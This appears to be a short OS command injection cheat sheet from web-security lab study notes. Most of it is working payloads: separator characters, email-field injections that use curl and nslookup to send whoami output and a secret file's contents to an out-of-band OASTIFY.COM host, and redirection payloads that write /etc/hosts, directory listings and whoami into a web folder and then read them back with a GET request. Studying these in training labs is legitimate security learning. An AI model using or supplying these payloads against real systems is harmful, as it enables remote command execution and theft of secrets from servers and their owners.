OS Cmd Injection
Using seperators to inject command
&&
&
||
|
;
`
'
"
0x0a
\nFeedback injection in mail
email=carlos@exam.net||curl+`whoami`.OASTIFY.COM||
||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||
email=peanut2019@nuts.net||nslookup+`whoami`.OASTIFY.COM||Output redirection
If OS command injection identified, and filter in place preventing complex command injection, attempt to redirect output to writable folder. Identify a path traversal vulnerability that allow reading of files only in current WEB APP.
Identify the working directory using
pwdcommand output redirected, and appending tooutput.txtfile every bash command stdout.
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||get output data
GET /image?filename=output.txt HTTP/2Last updated